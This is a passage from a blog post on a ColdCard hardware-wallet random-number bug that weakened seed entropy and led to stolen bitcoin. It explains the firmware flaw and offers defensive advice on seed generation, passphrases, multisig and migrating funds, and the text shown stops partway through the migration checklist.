<p>I am not exaggerating for a clickbait headline. On July 29, transactions started sweeping user wallets. One consolidation address <a href="https://mempool.space/address/bc1qnk4zh9qcnap2mycp56qjrgza3cc8ylrh8fecp0"target="_blank" rel="noopener">received 594.47723261 BTC across 501 outputs</a>. That is public blockchain data, not a Telegram screenshot. Issue 416 of <a href="https://bitcoinops.org/en/newsletters/2026/07/31/#wallets-generated-by-coldcard-at-risk-of-theft"target="_blank" rel="noopener">Bitcoin Optech</a>, published while the case was still unfolding, already estimated losses above <strong>1,000 BTC</strong>.</p>
<p>The exact number will still change. The 594 BTC cluster is directly observable; attributing every input to the same vulnerability and closing the global total requires more analysis. But the combination of victim reports, the sweep pattern, reproduction of the bug, and Coinkite&rsquo;s own admission is strong enough. Waiting for a pretty forensic report while a vulnerable seed keeps receiving funds is a terrible strategy.</p>
<blockquote>
  <p>Do not panic and type your 24 words into the first website that promises to &ldquo;check your ColdCard&rdquo; either. That is the other, much easier way to lose everything. A seed never goes into a website, chat, browser extension, or online computer. First understand whether you were affected. Then migrate calmly, verifying the address on the screen of a trusted signer.</p>

</blockquote>
<h2>Who needs to act now<span class="hx:absolute hx:-mt-20" id="who-needs-to-act-now"></span>
    <a href="#who-needs-to-act-now" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The vulnerability is in <strong>seed generation</strong>. What matters is the model and firmware used on the day those words were created, not the firmware installed today or where you imported the seed afterward.</p>
<blockquote>
  <p><strong>In practice: if you own any ColdCard, move the funds to a wallet derived from a completely new seed. Better to err on the side of caution.</strong> The ranges below show where the bug has already been confirmed; they are no reason to bet your life savings on the assumption that everything else is perfect. Updating the device does not repair the old seed.</p>

</blockquote>
<p>According to <a href="https://blog.coinkite.com/coldcard-mk3-seed-generation-warning/"target="_blank" rel="noopener">Coinkite&rsquo;s advisory</a> and <a href="https://engineering.block.xyz/blog/predictable-rng-fallback-and-32-bit-reseed-in-coldcard-firmware"target="_blank" rel="noopener">Block&rsquo;s independent analysis</a>, treat as compromised any seed generated under these conditions:</p>
<table>
  <thead>
      <tr>
          <th>Device</th>
          <th>Firmware that generated the seed</th>
          <th>Status</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Mk2</td>
          <td>4.0.0 through 4.1.9, according to Block</td>
          <td>Vulnerable. Migrate the seed and retire the device as a generator.</td>
      </tr>
      <tr>
          <td>Mk3</td>
          <td>4.0.1 through 4.1.9 in Coinkite&rsquo;s advisory; Block includes 4.0.0</td>
          <td>Vulnerable. Install 4.2.0 or later before generating another seed.</td>
      </tr>
      <tr>
          <td>Mk4 / Mk5 Standard</td>
          <td>Earlier than 5.6.0</td>
          <td>Affected. Update before generating another seed.</td>
      </tr>
      <tr>
          <td>Mk4 / Mk5 Edge</td>
          <td>Earlier than 6.6.0X</td>
          <td>Affected. Edge is a separate release track.</td>
      </tr>
      <tr>
          <td>Q Standard</td>
          <td>Earlier than 1.5.0Q</td>
          <td>Affected.</td>
      </tr>
      <tr>
          <td>Q Edge</td>
          <td>Earlier than 6.6.0QX</td>
          <td>Affected.</td>
      </tr>
  </tbody>
</table>
<p>Block includes the Mk2 running 4.x firmware in the same regression as the Mk3 and starts the vulnerable range for both at 4.0.0. Coinkite focused its advisory on the Mk3, starting at 4.0.1, and on current models. I would treat the entire 4.x line through 4.1.9 as compromised on both. If you own an Mk2, do not take comfort from its absence in the advisory headline.</p>
<p>There is one important exception: anyone who added at least <strong>50 fair, independent, and private die rolls</strong> during the original setup theoretically preserved at least 128 bits from an outside source. Coinkite itself says those seeds are not at risk from <strong>this bug alone</strong>. If you do not remember exactly how many rolls you made, which flow you used, or whether those results remained private, assume you did not do it.</p>
<p>A seed imported from another generator was not born from this defective RNG either. It may have other problems, of course, but not this one. Updating firmware now cannot travel back in time and repair any words. You must create a new seed and transfer the UTXOs to addresses derived from it.</p>
<blockquote>
  <p><strong>Restoring the same 24 words on a Trezor, Ledger, SeedSigner, or any other device is NOT a migration. You are still in danger.</strong> The hardware changed; the root and the entire universe of derived private keys remain the same. Another derivation path may display different addresses, but it adds no entropy. If the ColdCard generated that wallet using the weak RNG, importing its seed into another signer merely teaches the new device to reproduce the same vulnerable keys. Create a completely new wallet with new entropy, then make an on-chain transaction that moves the funds from the old wallet to addresses in the new one.</p>

</blockquote>
<p>I would do this even with a strong passphrase. The passphrase may have placed an independent barrier in front of the attacker, but Coinkite itself recommends migrating. After a failure of this magnitude, calculating the minimum theoretically acceptable risk is saving money in the wrong place.</p>
<h2>The bug: <code>#ifndef</code> does not mean &ldquo;if true&rdquo;<span class="hx:absolute hx:-mt-20" id="the-bug-ifndef-does-not-mean-if-true"></span>
    <a href="#the-bug-ifndef-does-not-mean-if-true" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Coinkite&rsquo;s <a href="https://blog.coinkite.com/entropy-technical-backgrounder/"target="_blank" rel="noopener">technical postmortem</a> is an embarrassing read.</p>
<p>In March 2021, the firmware replaced <code>ckcc.rng_bytes()</code> with <code>ngu.random.bytes()</code> during its migration to libNgU and the <code>libsecp256k1</code> used by Bitcoin Core. The library choice was good. The integration was disastrous.</p>
<p>The build code defined:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="cp">#define MICROPY_HW_ENABLE_RNG (0)</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>But the guard in libNgU checked this:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="cp">#ifndef MICROPY_HW_ENABLE_RNG
</span></span></span><span class="line"><span class="cl"><span class="cp">#error &#34;get a HW TRNG plz&#34;
</span></span></span><span class="line"><span class="cl"><span class="cp">#endif</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p><code>#ifndef</code> asks whether the symbol exists, not whether its value is nonzero. The symbol existed. The build passed. In the final resolution, <code>rng_get()</code> pointed to MicroPython&rsquo;s software fallback, a deterministic PRNG called Yasmarang, initialized with the microcontroller UID and timing registers. A UID identifies a chip. A clock measures time. Neither is a cryptographic source of randomness.</p>
<p>Worse, the correct TRNG implementation was inside the binary. Previous reviews looked at it and concluded everything was fine, but nobody verified the complete path between &ldquo;create new wallet&rdquo; and the symbol actually called in the executable. There was no integration test that failed when the seed came from the wrong generator.</p>
<p>On the Mk3, Coinkite&rsquo;s preliminary estimate is around <strong>40 bits of effective entropy</strong>, instead of the minimum 128 bits expected. On the Mk4, Q, and Mk5, values from the secure elements entered as a second layer, and the company estimates approximately <strong>72 bits</strong>. Block&rsquo;s analysis is harsher: only 32 bits of material from the secure elements reached the PRNG state during that reseed. The threat models and estimates are not identical. None comes close to the target.</p>
<p>Passing bad output through SHA-256 does not create entropy. If only <code>2^40</code> inputs exist, at most <code>2^40</code> possible hashes exist. They look nice and uniform and remain enumerable.</p>
<p>This sat on the most important path in the product for more than five years.</p>
<h2>How a 120-file rewrite got us here<span class="hx:absolute hx:-mt-20" id="how-a-120-file-rewrite-got-us-here"></span>
    <a href="#how-a-120-file-rewrite-got-us-here" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p><a href="https://x.com/zherbert/status/2082993276324319713"target="_blank" rel="noopener">Zach Herbert published a timeline</a> worth summarizing. He is a Foundation cofounder, Passport manufacturer, and Coinkite competitor, so read the interpretation with that context. The dates and commits, however, can be verified.</p>
<p>In July 2020, Foundation announced that its first Passport would build on ColdCard&rsquo;s GPLv3 firmware. Two days later, NVK publicly complained about the &ldquo;clone&rdquo; and said he would change the license. In November, ColdCard added MIT plus the Commons Clause, which left the code visible but restricted derivative commercial products. In January 2021, the change formally appeared in firmware 3.2.1.</p>
<p>On March 1 came the <code>First pass w/ libNgU</code> commit: 120 files changed, removal of GPL-covered libraries derived from Trezor, replacement of the cryptographic stack, and a change to seed generation. On March 17, version 4.0.0 announced the removal of the last GPL code.</p>
<p>There is no way to prove how much of the haste or scope came from the license dispute. The timeline itself acknowledges other legitimate goals: adopting <code>libsecp256k1</code>, accelerating AES/SHA, and enabling reproducible builds. The concrete fact is simpler: the bug entered in that same massive commit, and the product went five years without an end-to-end test of its most critical path.</p>
<p>That is engineering incompetence. A hardware wallet can have a secure element, sealed packaging, an air gap, and a website full of explanations about sovereignty. If the function that creates the key calls the wrong RNG and nobody tests it for five years, everything else is theater.</p>
<h2>This was a white swan, not a black swan<span class="hx:absolute hx:-mt-20" id="this-was-a-white-swan-not-a-black-swan"></span>
    <a href="#this-was-a-white-swan-not-a-black-swan" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>I have already seen people call this a &ldquo;black swan,&rdquo; as though a cosmic alignment of unforeseeable events had struck Coinkite. It was not.</p>
<p>The vulnerable code had been visible in the repository since March 2021. The commit was enormous, but not secret. The deterministic fallback was in a public submodule. The macro defined as zero was in the board configuration. The incorrect <code>#ifndef</code> was in the integration. What was missing was following the seed-generation call all the way to the symbol resolved in the binary and writing a test that proved where its entropy came from.</p>
<p>A black swan is rare, surprising, and only looks obvious afterward. This was a <strong>white swan</strong>: a known risk in the most sensitive category of the product, with an observable cause and a predictable consequence. Nobody knew the exact day someone would connect the dots and sweep the wallets. The bomb, however, had been assembled and ticking in public for five years.</p>
<p>And Coinkite helped reduce the number of people willing to defuse it.</p>
<p>In 2021, Marko Bencun from Shift/BitBox and Hugo Nguyen from Nunchuk <a href="https://blog.bitbox.swiss/en/remote-multisig-theft-attack-on-the-coldcard-hardware-wallet/"target="_blank" rel="noopener">responsibly disclosed a critical multisig flaw</a>. Coinkite fixed the code, but its release notes did not say it was a vulnerability or communicate any urgency. Bencun&rsquo;s bounty request was ignored. The company published a more explicit warning only after the researcher released the details.</p>
<p>The <a href="https://coinkite.com/responsible-disclosure"target="_blank" rel="noopener">current responsible disclosure policy</a> still leaves reward amount, eligibility, and timing to the company&rsquo;s discretion. Researchers working for competitors or well-funded labs are not eligible for a bounty. The page even throws in &ldquo;we are not here to make it easy for you,&rdquo; as if antagonizing people who audit your vault demonstrated personality.</p>
<p>Zach Herbert also <a href="https://www.zherbert.com/an-open-letter-to-nvk-and-coldcard/"target="_blank" rel="noopener">documented NVK&rsquo;s public attacks</a> on Foundation after it used ColdCard&rsquo;s GPL code: &ldquo;pure clone,&rdquo; &ldquo;leeches,&rdquo; and &ldquo;affinity scamming.&rdquo; Herbert is a competitor with an interest in the dispute, but the posts and screenshots exist. My opinion of NVK as a CEO is now terrible. He cultivated hostility toward the manufacturers and researchers who had the knowledge and technical incentive to review his product.</p>
<p>I do not need to claim that every researcher abandoned Coinkite. Just look at the incentives. A competent white hat can spend weeks dismantling firmware. If a company minimizes findings, ignores bounties, treats competitors as enemies, and reserves the right to decide when something deserves credit, that researcher works on another product. Open code permits auditing; it does not force anyone to audit for free for a company that treats them badly.</p>
<p>So this was not one-in-a-billion bad luck. It was a self-fulfilling prophecy. Extreme negligence accumulated risk until someone exploited it. When the bomb went off, it did not erase a number in a Coinkite spreadsheet. It took real bitcoin that, for some victims, represented years of savings or their life&rsquo;s savings.</p>
<h2>No, &ldquo;AI broke Bitcoin&rdquo; my ass<span class="hx:absolute hx:-mt-20" id="no-ai-broke-bitcoin-my-ass"></span>
    <a href="#no-ai-broke-bitcoin-my-ass" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Coinkite wrote that, because the firmware was public, &ldquo;we have to assume&rdquo; someone used AI to review old versions and found the bug. It provided no evidence. In the next paragraph, it admits that weeks earlier it had used one of the best available models to review the same code, and the model found nothing serious.</p>
<p>NVK later published <a href="https://x.com/nvk/status/2083216713693151552"target="_blank" rel="noopener">an apology on Coinkite&rsquo;s behalf</a>. He took responsibility for the bug, told every ColdCard owner to move their funds, acknowledged that new firmware cannot repair an old seed, and said the company would have to earn back its users&rsquo; trust. That is the bare minimum, but it matters that he said it.</p>
<p>The problem is that he ended by trying to turn the disaster into &ldquo;a sober reality of the new AI paradigm,&rdquo; arguing that AI-assisted review can now find old bugs faster than seasoned experts. No. This has fuck all to do with AI. The bug was basic, visible in the code for five years, and sat in the most important function of a hardware wallet. NVK was lucky it took this long.</p>
<p>Do not shift the blame to AI-assisted code review to justify piss-poor code. AI may have helped someone locate or exploit the flaw. AI did not write that <code>#ifndef</code>, disable the TRNG, approve the 120-file rewrite, or spend five years without an end-to-end test of seed generation. Coinkite did all of that.</p>
<p>After disclosure, researchers reproduced the flaw with the help of frontier models. Great. That shows AI can accelerate auditing and exploitation after someone points to where they should dig. It does not mean an AI broke ECDSA, <code>secp256k1</code>, SHA-256, BIP39, or Bitcoin.</p>
<p>The attacker enumerated a keyspace that a manufacturer had reduced from at least 128 bits to something around 40. This is brute force against predictable numbers. The Bitcoin protocol did exactly what it should: it accepted valid signatures produced by the correct private keys.</p>
<p>AI did not break Bitcoin. Coinkite left a basic regression untested at the heart of its firmware for five years. Blaming the tool that may have helped someone read the code is a convenient way to change the subject.</p>
<h2>What a wallet actually stores<span class="hx:absolute hx:-mt-20" id="what-a-wallet-actually-stores"></span>
    <a href="#what-a-wallet-actually-stores" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Bitcoin does not sit &ldquo;inside&rdquo; a ColdCard, Ledger, or Sparrow file. The blockchain contains UTXOs locked by scripts. Your wallet stores the material needed to find those UTXOs and produce signatures that satisfy the scripts.</p>
<p>At the most basic level, a private key is an integer chosen within the domain of the <code>secp256k1</code> curve. The public key is a point calculated from it. That path is easy to compute forward and infeasible to reverse with known computing power. Addresses are representations derived from public keys and scripts, not vaults where coins live.</p>
<p>I explained this foundation more carefully in <a href="/2019/11/21/akitando-67-entendendo-conceitos-basicos-de-criptografia-parte-1-2/">[Akitando #67] Understanding Basic Cryptography Concepts - Part 1</a> and <a href="/2019/11/26/akitando-68-entendendo-conceitos-basicos-de-criptografia-parte-2-2/">[Akitando #68] Understanding Basic Cryptography Concepts - Part 2</a>.</p>
<p>A modern wallet does not draw an independent key for each address. It starts with a root and uses <a href="https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki"target="_blank" rel="noopener">BIP32</a> to derive a deterministic tree of keys: accounts, receiving addresses, change, and so on. A backup of the root recovers the entire tree.</p>
<p><a href="https://github.com/bitcoin/bips/blob/master/bip-0039.mediawiki"target="_blank" rel="noopener">BIP39</a> is the layer that turns binary entropy into readable words and then converts the mnemonic plus a passphrase into a 512-bit binary seed used by BIP32. The words are a human-readable way to carry computer-generated randomness. The specification explicitly warns that it is not a method for inventing a nice phrase in your own head.</p>
<h2>Twelve or 24 words is the wrong question<span class="hx:absolute hx:-mt-20" id="twelve-or-24-words-is-the-wrong-question"></span>
    <a href="#twelve-or-24-words-is-the-wrong-question" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>A 12-word mnemonic encodes 128 bits of entropy plus a 4-bit checksum. A 24-word mnemonic encodes 256 bits plus an 8-bit checksum. Under normal conditions, 128 bits is already beyond brute-force reach.</p>
<p>But &ldquo;24 words&rdquo; does not guarantee that 256 real bits existed at the input. Vulnerable firmware could produce a perfectly valid sequence of 24 words, correct checksum and all, from an effective space of approximately 40 bits. The attacker does not need to try every possible word combination. They reproduce plausible states of the broken RNG and compare the derived addresses.</p>
<p>That is why the 12-versus-24 argument misses the point. Representation length cannot rescue a predictable source. A UUID printed in gold lettering remains predictable if someone called <code>rand()</code> with a timestamp.</p>
<h2>RNG, TRNG, and independent sources<span class="hx:absolute hx:-mt-20" id="rng-trng-and-independent-sources"></span>
    <a href="#rng-trng-and-independent-sources" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>RNG is the generic term for a random number generator. A PRNG takes an initial state, the seed, and expands it into a deterministic sequence. A properly designed CSPRNG remains safe as long as the initial state contains enough entropy and the algorithm does not leak that state.</p>
<p>A TRNG tries to harvest randomness from physical phenomena: electronic noise, oscillator jitter, and similar sources. <a href="https://support.ledger.com/article/4415198323089-zd"target="_blank" rel="noopener">Ledger explains its process</a> as a TRNG inside the Secure Element generating 256 bits, which BIP39 translates into 24 words. The company says an external lab tests that generator and certifies it under AIS-31. That is much better than a timer plus serial number, but it remains one source and one implementation you have chosen to trust.</p>
<p>Other projects prefer to combine sources. <a href="https://trezor.io/guides/trezor-devices/trezor-fundamentals/what-is-entropy-and-how-does-trezor-generate-your-wallet"target="_blank" rel="noopener">Trezor uses entropy from the device and host</a>. <a href="https://bitbox.swiss/bitbox02/security-features/"target="_blank" rel="noopener">BitBox02 documents five sources</a>: the secure chip TRNG, the microcontroller TRNG, a unique value installed at the factory, entropy supplied by the host, and a hash of the device password.</p>
<p>The word that matters here is <strong>independence</strong>. Two PRNGs initialized from the same clock are not two sources. Two values that come from the same secure element do not buy the independence the diagram implies either. Independent sources, combined through a correct cryptographic construction, keep the result strong even when some of them fail.</p>
<p>And &ldquo;combined correctly&rdquo; carries half the security in that sentence. XOR, hashes, and extractors have specific properties. Do not invent your own mixer in half an hour and put your net worth on top of it. Use a reviewed implementation with test vectors, and verify that the binary you execute actually calls that code. I think the reason is now obvious.</p>
<h2>Rolling dice is not that simple<span class="hx:absolute hx:-mt-20" id="rolling-dice-is-not-that-simple"></span>
    <a href="#rolling-dice-is-not-that-simple" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Each roll of an ideal D6 provides <code>log2(6)</code>, about 2.585 bits. That is where the figures of <strong>50 rolls</strong> for 128 bits and <strong>99 rolls</strong> for approximately 256 bits come from. <a href="https://coldcard.com/docs/verifying-dice-roll-math/"target="_blank" rel="noopener">ColdCard&rsquo;s documentation shows the calculation and the SHA-256 applied to the sequence</a>. <a href="https://github.com/SeedSigner/seedsigner"target="_blank" rel="noopener">SeedSigner</a> uses the same thresholds: 50 for 12 words or 99 for 24.</p>
<p>That calculation assumes a fair die and independent rolls. A cheap promotional plastic die may have bubbles, poorly cut faces, and a shifted center of mass. Your hand may repeat a motion, the tray may favor one position, and many people &ldquo;roll again&rdquo; when the die lands near an edge. Every human decision made after seeing the result introduces bias.</p>
<p>If I were generating a seed manually today, I would use <strong>precision casino-grade dice</strong> from more than one manufacturer or batch. <a href="https://blog.bitbox.swiss/en/roll-the-dice-generate-your-own-seed/"target="_blank" rel="noopener">BitBox itself recommends five casino-grade dice</a> for its manual procedure. I would define the reading order ahead of time, use a tray that lets the dice bounce, and accept every valid roll according to a rule written before I started. No rerolling because it &ldquo;didn&rsquo;t mix properly.&rdquo;</p>
<p>Even then, I would not trust the dice alone. I would mix independent sources: more than one set of dice, coin flips, entropy from an offline host, and a hardware TRNG when the device supports it. Making hundreds of rolls is cheap. The care lies in feeding everything to an audited mechanism that performs the cryptographic combination. Adding numbers, picking the &ldquo;most random&rdquo; words, or concatenating pieces of mnemonics yourself is a recipe for losing funds.</p>
<p>Check what your device actually implements. In Ledger&rsquo;s documented new-wallet setup, the Secure Element TRNG generates the entropy. In restore mode, <a href="https://www.ledger.com/academy/can-i-recover-my-hot-wallet-on-a-ledger"target="_blank" rel="noopener">the words must reconstruct exactly the same keys</a>. The TRNG cannot add secret entropy on top of the imported mnemonic because that would create another wallet and destroy the purpose of a backup. Restoring a seed made with dice therefore transfers custody and signing to the device, but it does not improve the original randomness.</p>
<p>With a commercial hardware wallet, I would choose one of two paths: generate a new root through the official flow of an updated device that documents how it combines independent sources, or generate BIP39 outside it through an auditable and fully offline process, then enter the words only through the signer&rsquo;s screen and buttons. A seed created in MetaMask, a website, or a connected laptop and later restored into a Ledger remains a hot seed. Ledger summarizes this well: <a href="https://www.ledger.com/academy/can-i-recover-my-hot-wallet-on-a-ledger"target="_blank" rel="noopener">move, don&rsquo;t merge</a>.</p>
<p>BTC D00M Guy has <a href="https://btcdoomguy.substack.com/p/como-gerar-sua-seed-e-fazer-o-backup"target="_blank" rel="noopener">a visual Portuguese-language tutorial on BIP39, dice, and recovery testing</a>. It is a good introduction to seeing the process, but I would not literally copy the old-phone-in-airplane-mode step for serious wealth. Airplane mode does not prove the device was clean, does not physically remove its radios, and formatting flash afterward gives me no verifiable erasure guarantee. It is fine for learning and rehearsal. To create the seed for my life savings, I prefer hardware with no radio, a verified ephemeral system, or a dedicated signer.</p>
<blockquote>
  <p>The rolls become a secret the moment you decide to use them. Do not photograph them, dictate them out loud, keep them in a phone note, or type them into a website. <a href="https://github.com/SeedSigner/seedsigner/blob/dev/docs/dice_verification.md"target="_blank" rel="noopener">SeedSigner&rsquo;s documentation</a> recommends that any verification of a real seed happen on an ephemeral system such as Tails, fully offline and discarded after the test.</p>
<p>More entropy does not fix a bad process either. One hundred rolls recorded by a cloud-connected camera are worth zero against someone who has the video.</p>

</blockquote>
<h2>Passphrase: another wallet, not another password<span class="hx:absolute hx:-mt-20" id="passphrase-another-wallet-not-another-password"></span>
    <a href="#passphrase-another-wallet-not-another-password" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>In BIP39, the mnemonic is the main input to PBKDF2-HMAC-SHA512. The salt is the string <code>mnemonic</code> concatenated with the passphrase, and the function runs 2,048 iterations. Every passphrase produces a valid wallet. One wrong character does not display &ldquo;incorrect password&rdquo;; it opens another, usually empty wallet.</p>
<p>A long, random, unique, and independent passphrase can protect an exposed or weak mnemonic. In the ColdCard case, it adds a secret that did not come from the defective RNG: the attacker must combine every mnemonic candidate with a passphrase attempt. If that passphrase has enough entropy and never leaked, the attack may become infeasible again.</p>
<p>But a quote, human pattern, or reused password becomes an offline dictionary attack with no rate limit. BIP39&rsquo;s 2,048 iterations do not turn a weak passphrase into a strong one. And losing it is just as final as losing the words. A hardware wallet PIN does not replace a passphrase. The PIN protects the physical device; the passphrase participates in key derivation.</p>
<p>Store the passphrase separately from the mnemonic and test a complete recovery before depositing a meaningful amount. Record the expected fingerprint and at least one address as well. During recovery, they tell you whether you opened the correct wallet.</p>
<blockquote>
  <p>In the ColdCard case, do not add a passphrase to the vulnerable seed now and call that a migration. Create a new root. The passphrase may be part of the new architecture, but the bitcoin must leave scripts derived from the old root.</p>

</blockquote>
<h2>Sparrow, air gaps, and PSBT<span class="hx:absolute hx:-mt-20" id="sparrow-air-gaps-and-psbt"></span>
    <a href="#sparrow-air-gaps-and-psbt" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p><a href="https://sparrowwallet.com/"target="_blank" rel="noopener">Sparrow</a> is the coordinator I use. It knows descriptors, xpubs, addresses, UTXOs, and history. It can construct a transaction, but in a watch-only configuration it has no private key with which to sign.</p>
<p>This is where <a href="https://github.com/bitcoin/bips/blob/master/bip-0174.mediawiki"target="_blank" rel="noopener">PSBT, standardized in BIP174</a>, comes in. Sparrow creates a Partially Signed Bitcoin Transaction with the inputs, outputs, amounts, and derivation data required. The file or QR code goes to the offline signer. The signer reviews it, adds its signature, and returns the PSBT. In multisig, the same package moves through the remaining signers until it reaches quorum. Sparrow combines, finalizes, and broadcasts it.</p>
<p>The air-gapped single-sig flow looks like this:</p>
<ol>
<li>Sparrow creates the transaction on the online computer.</li>
<li>You export the PSBT through QR code or microSD.</li>
<li>ColdCard, SeedSigner, or another device displays the destination, amount, and fee.</li>
<li>You verify them on the signer&rsquo;s screen and sign.</li>
<li>Sparrow imports the signed PSBT, finalizes it, and broadcasts it.</li>
</ol>
<p>An air gap reduces the attack surface. It is not a force field. QR codes and microSD still carry data, malicious firmware remains malicious firmware, and a compromised coordinator can try to replace the destination or change address. The signer&rsquo;s screen exists so you can compare the address, amount, and fee before pressing Confirm.</p>
<blockquote>
  <p>And an air gap cannot improve entropy retroactively. A vulnerable ColdCard could spend its entire life without a USB cable. The key was already born weak.</p>

</blockquote>
<h2>2-of-3 multisig: safer and much more bureaucratic<span class="hx:absolute hx:-mt-20" id="2-of-3-multisig-safer-and-much-more-bureaucratic"></span>
    <a href="#2-of-3-multisig-safer-and-much-more-bureaucratic" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Single-sig concentrates everything in one seed, one backup, and one implementation. Among options available today, <strong>2-of-3 multisig</strong> with genuinely independent signers is the closest thing I know to maximum security against that single point of failure.</p>
<p>You create three independent seeds on signers from different manufacturers and codebases. Sparrow creates a policy requiring two signatures. One device may break or one seed may leak without immediately surrendering the funds. Two signers remain enough for recovery.</p>
<p>&ldquo;Independent&rdquo; is once again the word doing the work. Three hardware wallets fed by three child seeds from the same BIP85 root still depend on one root. Three seeds generated by the same vulnerable ColdCard repeat the risk. Use separate processes and entropy sources. I might combine, for example, a commercial signer from another manufacturer, a SeedSigner using dice, and a third device with a different architecture.</p>
<p>In Sparrow, the conceptual procedure is:</p>
<ol>
<li>Create and back up each seed separately.</li>
<li>Export the fingerprint, derivation path, and xpub from each signer.</li>
<li>Create a <code>Multi Signature</code> wallet, normally Native SegWit, with a 2-of-3 policy.</li>
<li>Import all three keystores and back up the wallet&rsquo;s output descriptor.</li>
<li>Record which signers correspond to which fingerprints.</li>
<li>Verify one receiving address on more than one signer.</li>
<li>Make a small deposit, restore and test the signers, and perform a complete trial withdrawal.</li>
</ol>
<p>The descriptor cannot spend by itself, but it reveals every address and the full history. It is a necessary backup for reconstructing the policy and also sensitive privacy data. Keep copies in locations separate from the seeds.</p>
<p>When spending, Sparrow creates the PSBT; signer A signs; signer B signs; Sparrow combines and broadcasts. Every person or device must review the outputs. Multisig run by an operator who confirms everything automatically merely distributes the same mistake across three screens.</p>
<p>None of this is a mystery to me. I still find it bureaucratic as hell: three seeds, three backups, an output descriptor, separate locations, two devices for every spend, firmware updates, and a recovery plan that another family member must be able to execute when you are no longer around.</p>
<p>Every layer reduces one technical risk and creates another opportunity for the operator to make a mistake. Usability is part of security too. If the architecture becomes so annoying that you stop testing backups, stop updating signers, or cannot document inheritance, the perfect multisig diagram is not worth much.</p>
<blockquote>
  <p>I completely understand anyone who prefers to stay with single-sig and a strong, independent, well-stored passphrase. It is much easier to operate. Just make that choice knowing you accept more risk: you still depend on one root and one signing path. If that point fails, the entire wallet falls with it. A passphrase adds a barrier; it does not add a second independent signature.</p>

</blockquote>
<p><a href="https://sparrowwallet.com/docs/best-practices.html"target="_blank" rel="noopener">Sparrow&rsquo;s best practices guide</a> recommends 2-of-3 using hardware wallets from different vendors and backups stored in separate locations.</p>
<blockquote>
  <p>If one key in your 2-of-3 came from an affected ColdCard, the attacker potentially already controls that key and can produce a signature. They still cannot spend alone, but your effective threshold has fallen: now they only need to compromise one more signer. Create a new multisig wallet with a new cosigner and move the funds. You cannot &ldquo;replace one key&rdquo; while keeping the same addresses; the policy changed, so the scripts change too.</p>

</blockquote>
<h2>Fulcrum fixes privacy, not a weak key<span class="hx:absolute hx:-mt-20" id="fulcrum-fixes-privacy-not-a-weak-key"></span>
    <a href="#fulcrum-fixes-privacy-not-a-weak-key" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Sparrow needs to query the blockchain. On a public Electrum server, it requests the history of script hashes derived from your addresses. The server can correlate queries, timing, and IP address to group balances and history, even without receiving the raw xpub. To avoid that, I connect Sparrow to my own Bitcoin Core node through Fulcrum.</p>
<p>I showed the architecture and installation in <a href="/en/2026/04/01/bitcoin-on-the-home-server-sovereignty-with-coldcard-sparrow-fulcrum/">Bitcoin on the Home Server: Sovereignty and Privacy with Coldcard, Sparrow and Fulcrum</a>. That article remains useful, with one obvious correction: do not use a seed generated by affected ColdCard firmware.</p>
<p>Your node validates the blockchain. Fulcrum indexes it and responds quickly to Sparrow. That improves sovereignty and query privacy. Neither can stop an attacker from signing with a private key they reproduced from bad entropy.</p>
<h2>How I would migrate today<span class="hx:absolute hx:-mt-20" id="how-i-would-migrate-today"></span>
    <a href="#how-i-would-migrate-today" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Do not turn one emergency into a second accident. I would follow this order:</p>
<ol>
<li><strong>Take inventory.</strong> List the model, firmware that generated the seed, accounts, passphrases, derivation paths, and every multisig in which that key participates. Do not post balances or addresses on social media.</li>
<li><strong>Treat the seed as compromised.</strong> Do not enter it into online software or accept any third-party &ldquo;checker.&rdquo; Keep signing on the device only for as long as it takes to leave.</li>
